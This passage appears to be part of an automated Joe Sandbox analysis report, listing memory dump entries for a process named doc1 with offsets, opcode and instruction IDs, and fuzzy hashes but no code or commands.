                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 52b29dc0c9c6158e77063554466c40253c7d56f19f0a0c31614046d26772721c
                            • Instruction ID: 603a3515fbbe889bbc1d0d66ad3c577ef50b903cb4adc98e271c1a1002340552
                            • Opcode Fuzzy Hash: 52b29dc0c9c6158e77063554466c40253c7d56f19f0a0c31614046d26772721c
                            • Instruction Fuzzy Hash: 10E09A34808248DFC708DFA4D851AA9BFB8AB4A314F2485F8CC5927392C6319E42DB84
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f9758afd5da0973794cac870b27e11144988ea378ec11a342bf2da3f7f12a2e1
                            • Instruction ID: 175aa126efa3117aee5c4ede08c1acde566c0b772722157be36c912e6872a683
                            • Opcode Fuzzy Hash: f9758afd5da0973794cac870b27e11144988ea378ec11a342bf2da3f7f12a2e1
                            • Instruction Fuzzy Hash: 66E04FB990820CEFDB14DF94E881BA8BBBCEB86309F3481A9CC0857351D7719D46CB85
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7f268d3bcbd7e67b6171ce48659bdc14b777829b8a9d33efc64013a4467452d3
                            • Instruction ID: 97cd13a6a5310dbd330f1e2f245834c950e8a31b0a997960b4e0bcc011abfcbb
                            • Opcode Fuzzy Hash: 7f268d3bcbd7e67b6171ce48659bdc14b777829b8a9d33efc64013a4467452d3
                            • Instruction Fuzzy Hash: B0E01A75908208DBCB54DFA4E9446A8BB78EB45325F2081ACCC096B291DB325E57DB84
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4b9430bc673d4ea24219feb3cbcf2dc92b978c47d22959c4b7666a2951a3bba5
                            • Instruction ID: 169e6eeb08c57e076b4a9b3e749cedb5e8bf5daef636072291bc3e8552f646d9
                            • Opcode Fuzzy Hash: 4b9430bc673d4ea24219feb3cbcf2dc92b978c47d22959c4b7666a2951a3bba5
                            • Instruction Fuzzy Hash: 84E0E5B5D04208EFCB54DFA9D8416ACBBF9EB48300F1085A9DC14A2310D7355A50DF44
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ab249bbc2fe8b66299bc4d7355d7ff622a61ea0c41c26d5c07089a70d9f9b449
                            • Instruction ID: 45d562fa5472be795c4b1d51e55606b2f2475c38554bb5bb3aea5d67c444c044
                            • Opcode Fuzzy Hash: ab249bbc2fe8b66299bc4d7355d7ff622a61ea0c41c26d5c07089a70d9f9b449
                            • Instruction Fuzzy Hash: C4E01230944108DFCB54CF58D885AADBBB8EF46315F2081B9CC0957356C6325E56CF45
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0425325f004de7afd5a6a0c0795f28909f55c6f76db5c43498aa89cdb577e9b2
                            • Instruction ID: ee6fc74f61a1a1183c5512755c7215ee9bf1c71b0d694f90d5b0634ac8bd9cc1
                            • Opcode Fuzzy Hash: 0425325f004de7afd5a6a0c0795f28909f55c6f76db5c43498aa89cdb577e9b2
                            • Instruction Fuzzy Hash: 7BE04F71915308BBCB04EFB4E951BCEBBF5EB46314F50C4A89409E3785E6719F019B91
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 92ac0c96ea8f2f94fd2fe23e3fb707c5f4357e63e9f134e419740c3a95d23c58
                            • Instruction ID: abb641ca8f8a565a2b904f60625caf8f7b183b9a39ae413e38c6961549a163da
                            • Opcode Fuzzy Hash: 92ac0c96ea8f2f94fd2fe23e3fb707c5f4357e63e9f134e419740c3a95d23c58
                            • Instruction Fuzzy Hash: 33E0C274E04208EFCB94DFA8D4446ACBBF8EB88304F20C5A98818A3340E6319A42DF40
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 71b14c3e0233c89792c95831a8d40c29743c587ed051b51265397d3277e47b34
                            • Instruction ID: 4da10db2dd00d2d94b90d693be39a2d06fe6da7f8c99f1263dd12f3036360931
                            • Opcode Fuzzy Hash: 71b14c3e0233c89792c95831a8d40c29743c587ed051b51265397d3277e47b34
                            • Instruction Fuzzy Hash: 77E0D871D29204DFDB14DF74C80579D7FF4EB15221F2002A5C828D32E0D3354688CB00
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 92ac0c96ea8f2f94fd2fe23e3fb707c5f4357e63e9f134e419740c3a95d23c58
                            • Instruction ID: a3538ce72a25ae37418b401f6097f17a069a07993f79b963c3ffc4bf3b691698
                            • Opcode Fuzzy Hash: 92ac0c96ea8f2f94fd2fe23e3fb707c5f4357e63e9f134e419740c3a95d23c58
                            • Instruction Fuzzy Hash: 9CE0E574E04208EFCB94DFA8D441AADFBF8EB88300F20C1A98C1DA3340D6319A46DF40
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a70b98eda29601f6904ac93d872840aa4a6284b786cc9365712e0308f1f29017
                            • Instruction ID: 0e00c0812d8916aedb5d300e10fd0606217e4340111e0991f6a4bf7bf8bde915
                            • Opcode Fuzzy Hash: a70b98eda29601f6904ac93d872840aa4a6284b786cc9365712e0308f1f29017
                            • Instruction Fuzzy Hash: 0CE0E571E15208EFCB64DFA8D440AADBBF5EB48301F1081A99C04A3310D6759A91EF80
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2d5e718651b922d11191486f3d79209a27a01a78669b8fb2ed17057bf63790b3
                            • Instruction ID: 38ee5b1e4b1373e36d2e60c071260e729aee507788107d7ab425d243f21667f3
                            • Opcode Fuzzy Hash: 2d5e718651b922d11191486f3d79209a27a01a78669b8fb2ed17057bf63790b3
                            • Instruction Fuzzy Hash: 9BE09231818144CFD704CB68D450BA8BFB4EF46215F1482EDCC49A7752C2328B46CB51
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c1c21d55aebef52bb442580b9b1fd3c4822cbecbcac9621a870b795e9861b581
                            • Instruction ID: cee706e93ef2c309d73857d0db4abc0edafcaa3f1782112a29bdc39ece78a9ef
                            • Opcode Fuzzy Hash: c1c21d55aebef52bb442580b9b1fd3c4822cbecbcac9621a870b795e9861b581
                            • Instruction Fuzzy Hash: 76E01A75D09208EFCB14DF99D540AACFBB9EB88310F20C5AADC54A3351D6719E52DF84
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7c8e28c63b2402e61f6361743ec24ec2d636daf1deeecdbf109abd83b54e2046
                            • Instruction ID: f2328c1e639862d9311cd85698afd456e12f413968f97895aa217963d12c1c24
                            • Opcode Fuzzy Hash: 7c8e28c63b2402e61f6361743ec24ec2d636daf1deeecdbf109abd83b54e2046
                            • Instruction Fuzzy Hash: 25E0C272C89308DBC714DFA0D8457ECBF78EB85700F2085A9CC08A3690DA300E86DB5A
                            Memory Dump Source
                            • Opcode Fuzzy Hash: 96275f851bcc8c1a158b8a8697a4d8a96479870505f54ae11d8b07edbd5f6911
                            • Instruction Fuzzy Hash: 93D05E71C8920CDBC714DFA4D845AADBBBCAB85301F6045A98C0463690CA301E85DB9D
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 77c54fe58d05fe1c64ce9a9b39e5bc019576d8494b5ffe00ada7da4246494653
                            • Instruction ID: 89e51610e87f16581440d87bb35ebaf70ab48c6530bff35e6352484438030a65
                            • Opcode Fuzzy Hash: 77c54fe58d05fe1c64ce9a9b39e5bc019576d8494b5ffe00ada7da4246494653
                            • Instruction Fuzzy Hash: A5F05FB4E042298FCBA4CF24D89468ABBB5EB49315F1040E9D90EA3251DB355EC0CF19
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 117cfcae0d939bea0f49f723396ab865766853a7dcfc1b3e930b9551309ac462
                            • Instruction ID: baad70ffe77e8039fd1468aaae8d1fd835ca6d61a8d29b4c2546ad90b3cf594b
                            • Opcode Fuzzy Hash: 117cfcae0d939bea0f49f723396ab865766853a7dcfc1b3e930b9551309ac462
                            • Instruction Fuzzy Hash: 8BD05EB6828344AFC7018B20C859CA57FB5FB6B631B568096FA44CB233D331DC49E755
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 336d3f4f35e595630948f024baff2a6d6e3b11e73b490513bf7a5b547f6edd40
                            • Instruction ID: 70bacaa40230c29d4fce3d16fd987cb10c17d90add08be1cdce74c70af1be2e3
                            • Opcode Fuzzy Hash: 336d3f4f35e595630948f024baff2a6d6e3b11e73b490513bf7a5b547f6edd40
                            • Instruction Fuzzy Hash: AFE0E2BA5483D49FCB528E289844CA47F79AE1A22431980CAE5809F263D225D819EB61
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eed1200ecf492777020920102b65d45b43014c49d740de61c89cad90bdfed196
                            • Instruction ID: 8016b95a0da4135a5c47b9ae34d7f50783669f08874f40360328f666a240115a
                            • Opcode Fuzzy Hash: eed1200ecf492777020920102b65d45b43014c49d740de61c89cad90bdfed196
                            • Instruction Fuzzy Hash: 89E012B0A0530CEBDB04EFB4F951B6D77FAEB45300F10C5A8E909A7285EA715F009B80
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0aa608cb24bf1f32f615e380521a8a18ca994d89d238d68725d753572b689d70
                            • Instruction ID: 4cd305e3d52672a0aac29bdf968396f31a39977c3af4585b2f31abe9b54f55fe
                            • Opcode Fuzzy Hash: 0aa608cb24bf1f32f615e380521a8a18ca994d89d238d68725d753572b689d70
                            • Instruction Fuzzy Hash: 3AE01230A11208EFCB44EFB8E5107DDB7F9EB45314F1085A8940DE3345EA716F419B91
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f2b77b7260d82c3cfd2c3c13e7f3f3612619f6cdd09fde4163289acf6ebd9719
                            • Instruction ID: 03e91d2a497f057bf409065cb6e2b6ab84fadcb5877572d8af945b1497ea9076
                            • Opcode Fuzzy Hash: f2b77b7260d82c3cfd2c3c13e7f3f3612619f6cdd09fde4163289acf6ebd9719
                            • Instruction Fuzzy Hash: 8ED05E71A08108DBD754CF99D840AA9B7ACDB85214F208198984853351CA32AE02CB90
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e683b32590559c6760633daccfd033027941ce2e990d395dc419e5c55dbc1966
                            • Instruction ID: bfe1d007b0a83ec1f2c3288035ea82785ee6d375872374d51c119503ec5d1d86
                            • Opcode Fuzzy Hash: e683b32590559c6760633daccfd033027941ce2e990d395dc419e5c55dbc1966
                            • Instruction Fuzzy Hash: 61D0A771409308DBC714DFA898007797BBDDB01205F2004A8CC0492360C7314D40C745
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 31835e3afe90bb6893b971560d13567f1276c0060cd016afac89910b4da5d82b
                            • Instruction ID: 3481bbc5d80aaa9ba616799ef2a278bb9034a7e04ba210bd0b74422bd082216b
                            • Opcode Fuzzy Hash: 31835e3afe90bb6893b971560d13567f1276c0060cd016afac89910b4da5d82b
                            • Instruction Fuzzy Hash: C9E0C274A0122ACFCB70DF20D944BECBBB1BF59300F0040E9D459A2640E7700A84EF01
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 06143ee1e67e9bac7f660b42913add2d8c6bd104e575999485532602d56656dc
                            • Instruction ID: e61e361adeb297a2c4c03cff87e951b9009f1bf36a9bed17ef15f87aa829aeba
                            • Opcode Fuzzy Hash: 06143ee1e67e9bac7f660b42913add2d8c6bd104e575999485532602d56656dc
                            • Instruction Fuzzy Hash: 54D0C979350644DFC744AF69E858E257BBBFB8C62032084A4E909C7369EA31EC16CB50
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6b26acc19a83f5e537730113ce1b704f9fce2f330a2f1aeb8e3b1c7891182145
                            • Instruction ID: 8ed8f8a81148c31b720a4a816eb77f16c7342f371a890748187c33201b1763e3
                            • Opcode Fuzzy Hash: 6b26acc19a83f5e537730113ce1b704f9fce2f330a2f1aeb8e3b1c7891182145
                            • Instruction Fuzzy Hash: 2EE0BD798062288FDB60CF20C948BD9BBB2AB44305F0481E98409A22A1C7384ACACF04
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9437f1f9789f0d19119e66b19e22a48ed4c80f3952496d4cf3bd23d0efad4050
                            • Instruction ID: 98cc4e18166f637310efda9050a7b24fb6170ad0ca86ee0180bf33ce6473055f
                            • Opcode Fuzzy Hash: 9437f1f9789f0d19119e66b19e22a48ed4c80f3952496d4cf3bd23d0efad4050
                            • Instruction Fuzzy Hash: D0C08C72040704CFE2793BE8F90D3293AACAB0220BF500070DA6D508B88F7244D4CBA6
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 58b0fcb50e892fbe526734294ca6198d66229ee34d12fd0de506d86681cc7a8d
                            • Instruction ID: ac323b1f22be16663570a9649d5c8acfba37d3a339bd836e81958b4460122a30
                            • Opcode Fuzzy Hash: 58b0fcb50e892fbe526734294ca6198d66229ee34d12fd0de506d86681cc7a8d
                            • Instruction Fuzzy Hash: D9D06CB8E04329DFDB24DF10E884B9DBBB2FB8A340F1090A9D819A3354DB301981DF02
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 58cd535f952a7853644cc3eaaa78223ddb12a549f077c0cb75df26ded21e243a
                            • Instruction ID: d1b8c7aca9dc80f6718dfe88b69edda5e88046329caf08347de11b92155e2d24
                            • Opcode Fuzzy Hash: 58cd535f952a7853644cc3eaaa78223ddb12a549f077c0cb75df26ded21e243a
                            • Instruction Fuzzy Hash: 7EC08CB248074047C7204BB0BD46BA23B60B312331F188216D0D0846ABD32E0212A701
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 35155376d36be817ba8ad406a612f8fe746fefb236d5ae304d67d252e20c1a54
                            • Instruction ID: cd62f2e1d0e2a600f0376af5c2976f0efe1bd09172ae2f0c48e10268d1fda4cd
                            • Opcode Fuzzy Hash: 35155376d36be817ba8ad406a612f8fe746fefb236d5ae304d67d252e20c1a54
                            • Instruction Fuzzy Hash: 05C08C3055E381CFCF566770482608C3FE0DAC334434480EAA0A2FF697D8980A898751
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d3d4b71643b7011ed6204270022e924b9d447323e75e07b43808ea799d13e9ac
                            • Instruction ID: c4b00a3a6628923d84597c130a02f2c66c1ca3fab1322f5307e5e3ba79f0b485
                            • Opcode Fuzzy Hash: d3d4b71643b7011ed6204270022e924b9d447323e75e07b43808ea799d13e9ac
                            • Instruction Fuzzy Hash: 70C00276E1001A9A8B00DAD9E4408DCB774EB94321B004427D614A6144D63115668F55
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5760000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ad84073677ec97985af4190b4fc93377897854f82fa173d35a346852ee983eb8
                            • Instruction ID: fe889587279bd5db722f12ac26dd37d037197b4395fda414f2f18614b7370716
                            • Opcode Fuzzy Hash: ad84073677ec97985af4190b4fc93377897854f82fa173d35a346852ee983eb8
                            • Instruction Fuzzy Hash: 24D0EA74E153689FCBA4CF24D89879ABBB2FB0A300F4051E9E45AA3250DB741AC4DF02
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                            • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                            • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                            • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7c9c07d37bb8fb6cf0309a527e9db47170f5fff1525a682b70787f0f20909152
                            • Instruction ID: b5ecc1b032c3edd5b4911ff9f337c825e7456c4d2f3dc444e60b165ef44a2be9
                            • Opcode Fuzzy Hash: 7c9c07d37bb8fb6cf0309a527e9db47170f5fff1525a682b70787f0f20909152
                            • Instruction Fuzzy Hash: 52B09232000208AB86109E84EC04866BB6DAB59600720C025F609061168B33A822DB94
                            Memory Dump Source
                            • Source File: 00000001.00000002.2293174309.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1060000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 21ef7a23f9ac379f6eb5704d721477832f2b6b45d708b1f288f253058d889c7f
                            • Instruction ID: fafd7aa026c3cdec918fb6f647eaef2b1eae03be9e848901c1e1c2bf389bb856
                            • Opcode Fuzzy Hash: 21ef7a23f9ac379f6eb5704d721477832f2b6b45d708b1f288f253058d889c7f
                            • Instruction Fuzzy Hash: 8FB0123158C00CCA44104E65782403C3729CA8120D300D1C5B84E0A114CA1144204963
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b4c5fc805232c69a6f522b018422ef25009c5150b72d82cca41d9560188ae267
                            • Instruction ID: 9779ba2a7923fa07da8e56d0d2e9e95a31effa1b5f5ca2957746852a04d487bf
                            • Opcode Fuzzy Hash: b4c5fc805232c69a6f522b018422ef25009c5150b72d82cca41d9560188ae267
                            • Instruction Fuzzy Hash: B3B012324940009E97599600CA0AB4D7751EB91320700C039A080C1418C7308850DAA0
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304206739.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_57e0000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f58c191c874f8b8ee564f40b76e5dc4ebbeb66da1b7497260f47281213f9ee36
                            • Instruction ID: 603501b149afd4167121a481b6cf632995b78abe0f482f692e4878ee6fddb04a
                            • Opcode Fuzzy Hash: f58c191c874f8b8ee564f40b76e5dc4ebbeb66da1b7497260f47281213f9ee36
                            • Instruction Fuzzy Hash:
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: `IQ$
                            • API String ID: 0-3770184939
                            • Opcode ID: 00828e0041d56da374a34c9c4107c845f7ed990a1d02c5f2a6bd400feb729222
                            • Instruction ID: 770357086b839f3ec3b7238cc4fbbf75ff16bd361949701423403eaa3e06be78
                            • Opcode Fuzzy Hash: 00828e0041d56da374a34c9c4107c845f7ed990a1d02c5f2a6bd400feb729222
                            • Instruction Fuzzy Hash: 81810674E04208CFDB14EF69D488BAEBBFAFB89344F50A069D919E7295DB345885CF04
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: `IQ$
                            • API String ID: 0-3770184939
                            • Opcode ID: 14c99e67ebf3bcb5548d08b1fa74fa1dfb9c16c3560ad16cb6b819a3f4d479f0
                            • Instruction ID: d3bef941a7c49a0903f59c54b1a4160d5b1477b02590ba7d61bde14f5b899d86
                            • Opcode Fuzzy Hash: 14c99e67ebf3bcb5548d08b1fa74fa1dfb9c16c3560ad16cb6b819a3f4d479f0
                            • Instruction Fuzzy Hash: E2911574E04208CFDB14EF69D488BAEBBFAFB89344F109069D919E7295DB349885CF04
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: `IQ$
                            • API String ID: 0-3770184939
                            • Opcode ID: dccd0e6480a247dad7f1b5841093ea1e06e838916c3888e38f44721c01740826
                            • Instruction ID: 1af52282a7b5d34f4c70301d9196e1d19e9d4b042537829b3d615dfdf97724d6
                            • Opcode Fuzzy Hash: dccd0e6480a247dad7f1b5841093ea1e06e838916c3888e38f44721c01740826
                            • Instruction Fuzzy Hash: A6810374E05208CFDB14EF69D488BADBBFAFB89344F509069D909E7694DB349981CF04
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304331523.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_5810000_doc1.jbxd
                            Similarity
                            • API ID:
                            • String ID: `IQ$
                            • API String ID: 0-3770184939
                            • Opcode ID: 9e0be192cbbcd4a10ec2f19fded22d491409e718892134be2a941b8b9162720b
                            • Instruction ID: 927935d9f88b2119b572806539a4f4f05cca6f8d70219bca26dbb2e2ef12ad0a
                            • Opcode Fuzzy Hash: 9e0be192cbbcd4a10ec2f19fded22d491409e718892134be2a941b8b9162720b
                            • Instruction Fuzzy Hash: 8E71F374E04208CFDB54EFA9D488BADBBF6FB89344F509069D919E7294DB309886CF04
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2304009862.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false
